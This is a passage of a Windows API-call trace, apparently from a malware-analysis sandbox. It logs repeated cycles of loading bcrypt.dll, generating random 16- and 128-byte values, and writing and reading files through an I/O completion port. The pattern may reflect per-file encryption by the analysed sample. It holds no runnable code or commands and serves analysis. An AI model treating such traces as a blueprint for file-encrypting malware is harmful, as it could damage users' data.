lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.021] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.022] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.034] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa28, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.035] CloseHandle (hObject=0x2a8) returned 1 [0202.035] free (_Block=0x3df0008) [0202.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.102] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0202.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0202.103] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.103] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.103] free (_Block=0x3e305b8) [0202.103] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.103] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.104] free (_Block=0x1fa91d0) [0202.104] free (_Block=0x1fa2ed8) [0202.104] free (_Block=0x1fa90b8) [0202.104] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.117] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.398] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.398] CloseHandle (hObject=0x2a8) returned 1 [0202.398] free (_Block=0x3df0008) [0202.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0202.421] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0202.422] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.422] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.422] free (_Block=0x3e305b8) [0202.422] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.422] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.422] free (_Block=0x1fa91d0) [0202.422] free (_Block=0x1fa2ed8) [0202.422] free (_Block=0x1fa90b8) [0202.422] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.423] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.435] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x142e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.450] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x90c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.450] CloseHandle (hObject=0x2a8) returned 1 [0202.451] free (_Block=0x3df0008) [0202.451] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0202.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0202.464] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.464] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.464] free (_Block=0x3e305b8) [0202.464] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.464] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.465] free (_Block=0x1fa91d0) [0202.465] free (_Block=0x1fa2ed8) [0202.465] free (_Block=0x1fa90b8) [0202.465] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.465] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.488] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.489] CloseHandle (hObject=0x2a8) returned 1 [0202.489] free (_Block=0x3df0008) [0202.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0202.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0202.500] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.500] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.500] free (_Block=0x3e305b8) [0202.500] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.500] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.501] free (_Block=0x1fa91d0) [0202.501] free (_Block=0x1fa2ed8) [0202.501] free (_Block=0x1fa90b8) [0202.501] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.501] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.501] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.501] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.513] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x822, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.513] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.513] CloseHandle (hObject=0x2a8) returned 1 [0202.513] free (_Block=0x3df0008) [0202.513] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.522] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0202.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0202.523] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.523] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.523] free (_Block=0x3e305b8) [0202.523] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.523] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.523] free (_Block=0x1fa91d0) [0202.523] free (_Block=0x1fa2ed8) [0202.523] free (_Block=0x1fa90b8) [0202.523] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.524] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.543] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x12ea, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.710] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.905] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x967, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.905] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.906] CloseHandle (hObject=0x2a8) returned 1 [0202.906] free (_Block=0x3df0008) [0202.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.912] CloseHandle (hObject=0x2a8) returned 1 [0202.912] free (_Block=0x3df0008) [0202.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.919] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.919] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0202.919] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0202.920] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.920] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.920] free (_Block=0x3e305b8) [0202.920] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.920] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.920] free (_Block=0x1fa91d0) [0202.920] free (_Block=0x1fa2ed8) [0202.921] free (_Block=0x1fa90b8) [0202.921] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.921] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.930] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xea, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.931] CloseHandle (hObject=0x2a8) returned 1 [0202.931] free (_Block=0x3df0008) [0202.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.939] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.940] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0202.940] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.940] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0202.940] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.941] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.941] free (_Block=0x3e305b8) [0202.941] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.941] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.941] free (_Block=0x1fa91d0) [0202.941] free (_Block=0x1fa2ed8) [0202.941] free (_Block=0x1fa90b8) [0202.941] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.942] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.951] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.951] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.952] CloseHandle (hObject=0x2a8) returned 1 [0202.952] free (_Block=0x3df0008) [0202.952] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.959] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0202.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0202.960] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.960] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.960] free (_Block=0x3e305b8) [0202.960] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.960] calloc (_Count=0x82, _Size=0x4) returned 